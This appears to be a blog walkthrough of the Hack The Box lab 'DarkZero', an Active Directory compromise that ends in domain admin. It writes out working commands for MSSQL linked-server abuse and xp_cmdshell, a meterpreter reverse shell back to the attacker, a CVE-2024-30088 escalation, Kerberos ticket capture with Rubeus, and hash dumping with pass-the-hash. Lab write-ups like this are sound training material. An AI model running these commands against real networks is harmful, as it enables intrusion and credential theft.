Logo Havoc Hacking Articles

DarkZero HTB

⚡ A Deep Dive into DarkZero ⚡

Oct 7, 2025 - 5 minute read
feature image challenges

DarkZero HTB Walkthrough: From Database to Domain Admin

Hey everyone! 👋 Today I’m excited to share my walkthrough of the DarkZero machine from Hack The Box. This was a challenging Windows Active Directory environment that taught me some advanced penetration testing techniques. Let me break it down in a simple, friendly way so everyone can follow along!

🎯 Quick Overview

DarkZero is a medium-difficulty Windows machine that involves:

  • MSSQL database exploitation
  • Linked server abuse
  • Kerberos ticket attacks
  • Multiple domain controller compromise

Time to root: depends on your understanding and speed.
Key lesson: When one door closes, find another window!

🔍 Step 1: Initial Reconnaissance

First, I scanned the target to see what services were running:

nmap -sV -sC -T4 10.10.11.89

nmap nmap2 The scan revealed several interesting services:

  • Port 1433: Microsoft SQL Server - our main entry point!
  • Port 445: SMB file sharing
  • Port 5985: WinRM for remote management
  • Plus all the usual Active Directory ports (LDAP, Kerberos, etc.)

I also discovered the domain controller was “multihomed” - meaning it had two IP addresses (10.10.11.89 and 172.16.20.1). This would become important later! image

further enumeration revealed that Host is CLEAN or some ports are blocked

smb2-time: | date: 2025-10-05T08:36:38 
start_date: N/A 
Windows Domain Controller (hostname DC01,
domain darkzero.htb) Kerberos present (port 88) 
SMB with message signing required which prevents NTLM relay LDAP / LDAPS (389/636/3268/3269) for full AD enumeration via LDAP queries MSSQL (1433) which exposes Windows database Certificates on DC (DC01.darkzero.htb)

AD CS might be present or certificate templates used Clock-skew requires a time zone match for Kerberos requests Basic With the prized “John W” credentials in hand, i unleashed Netexec to conduct focused reconnaissance and preliminary enumeration.

`nxc smb dc01.darkzero.htb -u ‘john.w’ -p ‘RFulUtONCOL!’ –users image

Enumerated 4 local users

darkzero Shares.

nxc smb dc01.darkzero.htb -u 'john.w' -p 'RFulUtONCOL!' --shares image

furthermore i used bloodhound to dump everything once and for all. `bloodhound-python \ -dc ‘dc01.darkzero.htb’ -d ‘darkzero.htb’ \ -u ‘john.w’ -p ‘RFulUtONCOL!’ \ -ns $target_ip –zip -c All

image

No obvious privilege-escalation vectors surfaced. However, the ingestion revealed a domain-trust relationship: This denotes a bidirectional trust. DARKZERO.EXT can authenticate into DARKZERO.HTB and DARKZERO.HTB can authenticate into DARKZERO.EXT thats effectively a two-way trust and Boom i alted my recon

Step 2: Finding Our First Entry

The SQL Server on port 1433 looked promising. I tried connecting with some default credentials and struck gold:

impacket-mssqlclient 'darkzero.htb/john.w:RFulUtONCOL!'@10.10.11.89 -windows-auth

image Success! I was in the SQL database. But when I tried to enable command execution, I hit a roadblock - insufficient privileges on DC01.

🔗 Step 3: The Linked Server Trick

Here’s where things got interesting. I discovered a “linked server” to another domain controller called DC02:

enum_links image

Linked servers let SQL servers talk to each other. Even better - when I switched to the DC02 linked server, I had higher privileges!

use_link "DC02.darkzero.ext" enable_xp_cmdshell xp_cmdshell whoami

image Why this worked: The SQL service on DC01 connected to DC02 using different credentials (dc01_sql_svc) that had admin privileges on DC02. It’s like having a friend who can open doors you can’t!

Step 4: Getting Our First Shell

Now with command execution on DC02, I used Metasploit’s web_delivery module to get a reverse shell:

On my Kali machine

``msfconsole -q use multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST tun0 ; set LPORT 4444 ; exploit

image

In the SQL session

Boom! I had a meterpreter shell as svc_sql on DC02. Checking the network interfaces, I saw I was on the internal network (172.16.20.2).

Step 5: Becoming SYSTEM

My svc_sql user had limited privileges, so I needed to escalate. I used CVE-2024-30088, a Windows privilege escalation vulnerability:

use exploit/windows/local/cve_2024_30088_authz_basep set SESSION 1 set LHOST tun0 set LPORT 4445 set AutoCheck false exploit

image Success! I was now NT AUTHORITY\SYSTEM - the Windows equivalent of root. I could now read the user flag:

image

`type C:\Users\Administrator\Desktop\user.txt image

Step 6: The Kerberos Ticket Heist

This was the coolest part! I used a tool called Rubeus to capture Kerberos tickets. Here’s how it worked:

  1. Upload Rubeus to DC02

    image

  2. Start monitoring for new tickets: Rubeus.exe monitor /interval:1 /nowrap

    image

  3. Trigger authentication from DC01 to DC02: xp_dirtree '\\DC02.darkzero.ext\share'

    image

When DC01 tried to access the fake share on DC02, it had to authenticate. Rubeus captured this authentication attempt and gave me DC01’s Kerberos ticket!

Think of it like this: I tricked DC01 into showing me its ID card, then I made a copy of it.That would be the coolest part to explain it like that.laughs

Step 7: Converting and Using the Ticket

The captured ticket was in base64 format, so I needed to convert it:

cat ticket.bs4.kirbi | base64 -d > ticket.kirbi

Then, I converted it to a format usable by Impacket: impacket-ticketConverter ticket.kirbi dc01_admin.ccache export KRB5CCNAME=dc01_admin.ccache image

Now I had a valid Kerberos ticket for DC01’s machine account. I could use this to dump all the password hashes from DC01:

`impacket-secretsdump -k -no-pass ‘darkzero.htb/DC01$@DC01.darkzero.htb

image

🏆 Step 8: Domain Admin and Root Flag

The hash dump gave me the Administrator password hash. I used this to log into DC01:

`evil-winrm -i 10.10.11.89 -u Administrator -H [] image

And finally, the moment of truth:

`type C:\Users\Administrator\Desktop\root.txt image Domain owned! 🎉

Key Takeaways

  1. Linked servers are dangerous - They can provide privilege escalation paths between database servers
  2. Kerberos monitoring is powerful - Tools like Rubeus can capture valuable authentication material
  3. Persistence pays off - I faced clock sync issues but found alternative methods
  4. Think laterally - The path to domain admin went through multiple systems

Defense Recommendations

For defenders:

  • Monitor linked server configurations - They shouldn’t use high-privilege accounts
  • Watch for Kerberos anomalies - Unexpected ticket requests can indicate attack activity
  • Segment internal networks - Even if attackers get in, limit their lateral movement
  • Regularly patch - The CVE-2024-30088 exploit worked because of unpatched systems

🎓 What I Learned

This machine taught me that sometimes the most complex attacks are just a series of simple steps chained together. Each barrier I hit became an opportunity to learn a new technique.

The satisfaction of finally seeing that root flag after hours of troubleshooting was incredible! That’s what makes Hack The Box so addictive. 😄

Happy hacking everyone! Remember - practice ethically and always keep learning.